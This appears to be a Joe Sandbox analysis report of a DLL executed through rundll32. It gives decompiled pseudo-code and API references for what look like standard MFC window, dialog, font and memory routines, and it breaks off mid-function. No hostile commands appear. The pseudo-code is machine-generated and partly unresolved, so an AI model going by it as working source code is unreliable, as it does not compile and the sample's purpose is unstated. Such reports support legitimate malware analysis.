                                                                                                        						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                        						L9:
                                                                                                        						if(_t58 != 0) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t43 = _t40 - 0x62;
                                                                                                        						if(_t43 == 0) {
                                                                                                        							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                        							RemovePropA(_t66, _t68);
                                                                                                        							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                        							goto L10;
                                                                                                        						} else {
                                                                                                        							if(_t43 != 0x8e) {
                                                                                                        								L10:
                                                                                                        								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                        							} else {
                                                                                                        								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                        								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                        								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10017C60( *(_t71 - 0x14));
                                                                                                        			}













                                                                                                        0x10011245
                                                                                                        0x10011245
                                                                                                        0x10011245
                                                                                                        0x1001124c
                                                                                                        0x10011251
                                                                                                        0x10011254
                                                                                                        0x1001125b
                                                                                                        0x10011261
                                                                                                        0x10011265
                                                                                                        0x10011269
                                                                                                        0x10011271
                                                                                                        0x10011272
                                                                                                        0x10011275
                                                                                                        0x1001131e
                                                                                                        0x10011330
                                                                                                        0x00000000
                                                                                                        0x1001127b
                                                                                                        0x1001127b
                                                                                                        0x1001127e
                                                                                                        0x10011316
                                                                                                        0x10011335
                                                                                                        0x10011337
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011280
                                                                                                        0x10011280
                                                                                                        0x10011283
                                                                                                        0x100112dc
                                                                                                        0x100112e4
                                                                                                        0x100112f2
                                                                                                        0x00000000
                                                                                                        0x10011285
                                                                                                        0x1001128a
                                                                                                        0x10011339
                                                                                                        0x1001134c
                                                                                                        0x10011290
                                                                                                        0x100112a1
                                                                                                        0x100112be
                                                                                                        0x100112c6
                                                                                                        0x100112c6
                                                                                                        0x1001128a
                                                                                                        0x10011283
                                                                                                        0x1001127e
                                                                                                        0x100112d3

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1001124C
                                                                                                        • GetPropA.USER32 ref: 1001125B
                                                                                                        • CallWindowProcA.USER32 ref: 100112B5
                                                                                                          • Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
                                                                                                          • Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138
                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
                                                                                                        • RemovePropA.USER32 ref: 100112E4
                                                                                                        • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 100112EB
                                                                                                        • GlobalDeleteAtom.KERNEL32 ref: 100112F2
                                                                                                          • Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871
                                                                                                        • CallWindowProcA.USER32 ref: 10011346
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                        • String ID: AfxOldWndProc423
                                                                                                        • API String ID: 2702501687-1060338832
                                                                                                        • Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
                                                                                                        • Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
                                                                                                        • Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
                                                                                                        • Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t65;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t74;
                                                                                                        				struct HWND__* _t75;
                                                                                                        				signed int _t78;
                                                                                                        				signed int _t95;
                                                                                                        				intOrPtr* _t103;
                                                                                                        				signed int _t110;
                                                                                                        				void* _t124;
                                                                                                        				signed int _t129;
                                                                                                        				DLGTEMPLATE* _t130;
                                                                                                        				struct HWND__* _t131;
                                                                                                        				void* _t132;
                                                                                                        
                                                                                                        				_t128 = __esi;
                                                                                                        				_t124 = __edx;
                                                                                                        				_t104 = __ecx;
                                                                                                        				_push(0x3c);
                                                                                                        				E10017BF4(E1002800E, __ebx, __edi, __esi);
                                                                                                        				_t103 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                        				_t136 =  *(_t132 + 0x10);
                                                                                                        				if( *(_t132 + 0x10) == 0) {
                                                                                                        					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                        				}
                                                                                                        				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                        				 *(_t132 - 0x28) = _t129;
                                                                                                        				 *(_t132 - 0x14) = 0;
                                                                                                        				 *(_t132 - 4) = 0;
                                                                                                        				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                        				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                        				if(_t129 == 0) {
                                                                                                        					_t130 =  *(_t132 + 8);
                                                                                                        					L7:
                                                                                                        					__eflags = _t130;
                                                                                                        					if(_t130 == 0) {
                                                                                                        						L4:
                                                                                                        						_t65 = 0;
                                                                                                        						L32:
                                                                                                        						return E10017C60(_t65);
                                                                                                        					}
                                                                                                        					E10009E23(_t132 - 0x1c, E10013479());
                                                                                                        					 *(_t132 - 4) = 1;
                                                                                                        					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                        					__eflags =  *0x1005aa84; // 0x0
                                                                                                        					_t72 = 0 | __eflags == 0x00000000;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						L14:
                                                                                                        						__eflags = _t72;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							L17:
                                                                                                        							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                        							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                        							E100115DC(0, __eflags, _t103);
                                                                                                        							_t74 =  *(_t132 + 0xc);
                                                                                                        							__eflags = _t74;
                                                                                                        							if(_t74 != 0) {
                                                                                                        								_t75 =  *(_t74 + 0x20);
                                                                                                        							} else {
                                                                                                        								_t75 = 0;
                                                                                                        							}
                                                                                                        							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
                                                                                                        							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                        							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                        							_t110 =  *(_t132 - 0x28);
                                                                                                        							__eflags = _t110;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                        								__eflags = _t131;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t78 = E1000FC04(_t103, 0, __eflags);
                                                                                                        							__eflags = _t78;
                                                                                                        							if(_t78 == 0) {
                                                                                                        								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							if(_t131 != 0) {
                                                                                                        								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                        								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                        									DestroyWindow(_t131);
                                                                                                        									_t131 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							__eflags =  *(_t132 - 0x14);
                                                                                                        							if( *(_t132 - 0x14) != 0) {
                                                                                                        								GlobalUnlock( *(_t132 - 0x14));
                                                                                                        								GlobalFree( *(_t132 - 0x14));
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							_t59 = _t131 != 0;
                                                                                                        							__eflags = _t59;
                                                                                                        							_t65 = 0 | _t59;
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						L15:
                                                                                                        						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                        						 *(_t132 - 4) = 2;
                                                                                                        						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                        						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
                                                                                                        						 *(_t132 - 4) = 1;
                                                                                                        						E100146C9(_t132 - 0x38);
                                                                                                        						__eflags =  *(_t132 - 0x14);
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                        						}
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags = _t72;
                                                                                                        					if(_t72 != 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = GetSystemMetrics(0x2a);
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
                                                                                                        					__eflags = _t95;
                                                                                                        					_t72 = 0 | _t95 == 0x00000000;
                                                                                                        					__eflags = _t72;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                        					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                        						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					}
                                                                                                        					goto L14;
                                                                                                        				}
                                                                                                        				_push(_t132 - 0x48);
                                                                                                        				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                        					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				goto L4;
                                                                                                        			}
















                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c98b
                                                                                                        0x1000c990
                                                                                                        0x1000c992
                                                                                                        0x1000c997
                                                                                                        0x1000c99a
                                                                                                        0x1000c9a4
                                                                                                        0x1000c9a4
                                                                                                        0x1000c9ac
                                                                                                        0x1000c9b1
                                                                                                        0x1000c9b4
                                                                                                        0x1000c9b7
                                                                                                        0x1000c9ba
                                                                                                        0x1000c9c4
                                                                                                        0x1000c9cb
                                                                                                        0x1000c9f8
                                                                                                        0x1000c9fb
                                                                                                        0x1000c9fb
                                                                                                        0x1000c9fd
                                                                                                        0x1000c9df
                                                                                                        0x1000c9df
                                                                                                        0x1000cb6c
                                                                                                        0x1000cb71
                                                                                                        0x1000cb71
                                                                                                        0x1000ca08
                                                                                                        0x1000ca16
                                                                                                        0x1000ca1a
                                                                                                        0x1000ca27
                                                                                                        0x1000ca2c
                                                                                                        0x1000ca32
                                                                                                        0x1000ca34
                                                                                                        0x1000ca6a
                                                                                                        0x1000ca6a
                                                                                                        0x1000ca6c
                                                                                                        0x1000caad
                                                                                                        0x1000caad
                                                                                                        0x1000cab1
                                                                                                        0x1000cab6
                                                                                                        0x1000cabb
                                                                                                        0x1000cabe
                                                                                                        0x1000cac0
                                                                                                        0x1000cac6
                                                                                                        0x1000cac2
                                                                                                        0x1000cac2
                                                                                                        0x1000cac2
                                                                                                        0x1000cae0
                                                                                                        0x1000cae2
                                                                                                        0x1000cae7
                                                                                                        0x1000cb09
                                                                                                        0x1000cb0c
                                                                                                        0x1000cb0e
                                                                                                        0x1000cb16
                                                                                                        0x1000cb19
                                                                                                        0x1000cb1b
                                                                                                        0x1000cb22
                                                                                                        0x1000cb22
                                                                                                        0x1000cb1b
                                                                                                        0x1000cb28
                                                                                                        0x1000cb2d
                                                                                                        0x1000cb2f
                                                                                                        0x1000cb35
                                                                                                        0x1000cb35
                                                                                                        0x1000cb3b
                                                                                                        0x1000cb3d
                                                                                                        0x1000cb3f
                                                                                                        0x1000cb43
                                                                                                        0x1000cb46
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb43
                                                                                                        0x1000cb4e
                                                                                                        0x1000cb51
                                                                                                        0x1000cb56
                                                                                                        0x1000cb5f
                                                                                                        0x1000cb5f
                                                                                                        0x1000cb67
                                                                                                        0x1000cb69
                                                                                                        0x1000cb69
                                                                                                        0x1000cb69
                                                                                                        0x00000000
                                                                                                        0x1000cb69
                                                                                                        0x1000ca6e
                                                                                                        0x1000ca72
                                                                                                        0x1000ca7d
                                                                                                        0x1000ca81
                                                                                                        0x1000ca91
                                                                                                        0x1000ca94
                                                                                                        0x1000ca98
                                                                                                        0x1000ca9d
                                                                                                        0x1000caa0
                                                                                                        0x1000caab
                                                                                                        0x1000caab
                                                                                                        0x00000000
                                                                                                        0x1000caa0
                                                                                                        0x1000ca36
                                                                                                        0x1000ca38
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca42
                                                                                                        0x1000ca44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca4e
                                                                                                        0x1000ca55
                                                                                                        0x1000ca5a
                                                                                                        0x1000ca5c
                                                                                                        0x1000ca5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ca60
                                                                                                        0x1000ca65
                                                                                                        0x1000ca67
                                                                                                        0x1000ca67
                                                                                                        0x00000000
                                                                                                        0x1000ca65
                                                                                                        0x1000c9d2
                                                                                                        0x1000c9dd
                                                                                                        0x1000c9f4
                                                                                                        0x00000000
                                                                                                        0x1000c9f4
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000C98B
                                                                                                        • GetSystemMetrics.USER32 ref: 1000CA3C
                                                                                                        • GlobalLock.KERNEL32 ref: 1000CAA5
                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                        • String ID: MS Shell Dlg
                                                                                                        • API String ID: 1736106359-76309092
                                                                                                        • Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                        • Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
                                                                                                        • Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                        • Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E100149BE(intOrPtr __ecx, signed int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v40;
                                                                                                        				void _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t12;
                                                                                                        				void* _t14;
                                                                                                        				char* _t23;
                                                                                                        				void* _t29;
                                                                                                        				signed short _t30;
                                                                                                        				struct HDC__* _t31;
                                                                                                        				signed int _t32;
                                                                                                        
                                                                                                        				_t12 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t12 ^ _t32;
                                                                                                        				_t31 = GetStockObject;
                                                                                                        				_t30 = 0xa;
                                                                                                        				_v72 = __ecx;
                                                                                                        				_t23 = "System";
                                                                                                        				_t14 = GetStockObject(0x11);
                                                                                                        				if(_t14 != 0) {
                                                                                                        					L2:
                                                                                                        					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                        						_t23 =  &_v40;
                                                                                                        						_t31 = GetDC(0);
                                                                                                        						if(_v68 < 0) {
                                                                                                        							_v68 =  ~_v68;
                                                                                                        						}
                                                                                                        						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                        						ReleaseDC(0, _t31);
                                                                                                        					}
                                                                                                        					L6:
                                                                                                        					_t16 = _a4;
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_t16 = _t30 & 0x0000ffff;
                                                                                                        					}
                                                                                                        					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                        				}
                                                                                                        				_t14 = GetStockObject(0xd);
                                                                                                        				if(_t14 == 0) {
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				goto L2;
                                                                                                        			}

















                                                                                                        0x100149c4
                                                                                                        0x100149cb
                                                                                                        0x100149d0
                                                                                                        0x100149d9
                                                                                                        0x100149dc
                                                                                                        0x100149df
                                                                                                        0x100149e4
                                                                                                        0x100149e8
                                                                                                        0x100149f2
                                                                                                        0x10014a01
                                                                                                        0x10014a05
                                                                                                        0x10014a12
                                                                                                        0x10014a14
                                                                                                        0x10014a16
                                                                                                        0x10014a16
                                                                                                        0x10014a31
                                                                                                        0x10014a34
                                                                                                        0x10014a34
                                                                                                        0x10014a3a
                                                                                                        0x10014a3a
                                                                                                        0x10014a40
                                                                                                        0x10014a42
                                                                                                        0x10014a42
                                                                                                        0x10014a5d
                                                                                                        0x10014a5d
                                                                                                        0x100149ec
                                                                                                        0x100149f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000011), ref: 100149E4
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 100149EC
                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
                                                                                                        • GetDC.USER32(00000000), ref: 10014A08
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
                                                                                                        • ReleaseDC.USER32 ref: 10014A34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                        • String ID: System
                                                                                                        • API String ID: 46613423-3470857405
                                                                                                        • Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                        • Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
                                                                                                        • Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                        • Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E10009360(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                        				long _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				long _v16;
                                                                                                        				long _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				long _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _t38;
                                                                                                        				long _t49;
                                                                                                        				intOrPtr _t50;
                                                                                                        				void* _t60;
                                                                                                        				long _t76;
                                                                                                        				void* _t84;
                                                                                                        				void* _t85;
                                                                                                        
                                                                                                        				_v32 = __ecx;
                                                                                                        				if(_a4 == 8) {
                                                                                                        					return E100090F0(_t60, _v32, _t84, _t85);
                                                                                                        				}
                                                                                                        				if(_a4 == 9) {
                                                                                                        					_t38 =  *0x10058ece & 0x000000ff;
                                                                                                        					if(_t38 != 0) {
                                                                                                        						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
                                                                                                        						_v12 = _v32 + 0x74;
                                                                                                        						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
                                                                                                        						if(0 == 0) {
                                                                                                        							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
                                                                                                        						}
                                                                                                        						_t76 =  *0x10058f0c; // 0x1005aa2c
                                                                                                        						_v16 = _t76;
                                                                                                        						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
                                                                                                        						if(_v8 > 0x1000) {
                                                                                                        							_t50 =  *0x10058f0c; // 0x1005aa2c
                                                                                                        							_t21 = _t50 - 0xc; // 0x0
                                                                                                        							_v20 =  *_t21;
                                                                                                        							_v24 = _v32 + 0x74;
                                                                                                        							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
                                                                                                        							if(0 == 0) {
                                                                                                        								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
                                                                                                        							}
                                                                                                        							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
                                                                                                        						}
                                                                                                        						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
                                                                                                        						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
                                                                                                        						 *0x10058ece = 0;
                                                                                                        						return _t49;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t38;
                                                                                                        			}

















                                                                                                        0x10009366
                                                                                                        0x1000936d
                                                                                                        0x00000000
                                                                                                        0x10009372
                                                                                                        0x10009380
                                                                                                        0x10009386
                                                                                                        0x1000938f
                                                                                                        0x100093ab
                                                                                                        0x100093b4
                                                                                                        0x100093cb
                                                                                                        0x100093d3
                                                                                                        0x100093e5
                                                                                                        0x100093e5
                                                                                                        0x100093eb
                                                                                                        0x100093f1
                                                                                                        0x10009409
                                                                                                        0x10009416
                                                                                                        0x10009418
                                                                                                        0x1000941d
                                                                                                        0x10009420
                                                                                                        0x10009429
                                                                                                        0x1000943e
                                                                                                        0x10009446
                                                                                                        0x10009458
                                                                                                        0x10009458
                                                                                                        0x10009474
                                                                                                        0x10009474
                                                                                                        0x10009493
                                                                                                        0x100094ab
                                                                                                        0x100094b1
                                                                                                        0x00000000
                                                                                                        0x100094b1
                                                                                                        0x1000938f
                                                                                                        0x100094bb

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697954797-0
                                                                                                        • Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
                                                                                                        • Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
                                                                                                        • Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
                                                                                                        • Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t36;
                                                                                                        				void* _t39;
                                                                                                        				long _t41;
                                                                                                        				void* _t42;
                                                                                                        				long _t47;
                                                                                                        				void* _t53;
                                                                                                        				signed int _t55;
                                                                                                        				long* _t62;
                                                                                                        				struct _CRITICAL_SECTION* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t66;
                                                                                                        
                                                                                                        				_push(0x10);
                                                                                                        				E10017BF4(E10028893, __ebx, __edi, __esi);
                                                                                                        				_t62 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                        				_t64 = __ecx + 0x1c;
                                                                                                        				 *(_t66 - 0x14) = _t64;
                                                                                                        				EnterCriticalSection(_t64);
                                                                                                        				_t36 =  *(_t66 + 8);
                                                                                                        				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                        					_push(_t64);
                                                                                                        				} else {
                                                                                                        					_t65 = TlsGetValue( *_t62);
                                                                                                        					if(_t65 == 0) {
                                                                                                        						 *(_t66 - 4) = 0;
                                                                                                        						_t39 = E10013965(0x10);
                                                                                                        						__eflags = _t39;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t65 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						} else {
                                                                                                        							 *_t39 = 0x1002b1d8;
                                                                                                        							_t65 = _t39;
                                                                                                        						}
                                                                                                        						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                        						_t51 =  &(_t62[5]);
                                                                                                        						 *(_t65 + 8) = 0;
                                                                                                        						 *(_t65 + 0xc) = 0;
                                                                                                        						E10013A82( &(_t62[5]), _t65);
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						_t55 =  *(_t66 + 8);
                                                                                                        						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                        							L5:
                                                                                                        							_t75 =  *(_t65 + 0xc);
                                                                                                        							if( *(_t65 + 0xc) != 0) {
                                                                                                        								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
                                                                                                        								_t53 = 2;
                                                                                                        								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                        							} else {
                                                                                                        								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
                                                                                                        								_pop(_t53);
                                                                                                        								_t42 = LocalAlloc(0, _t47);
                                                                                                        							}
                                                                                                        							_t76 = _t42;
                                                                                                        							if(_t42 == 0) {
                                                                                                        								LeaveCriticalSection( *(_t66 - 0x14));
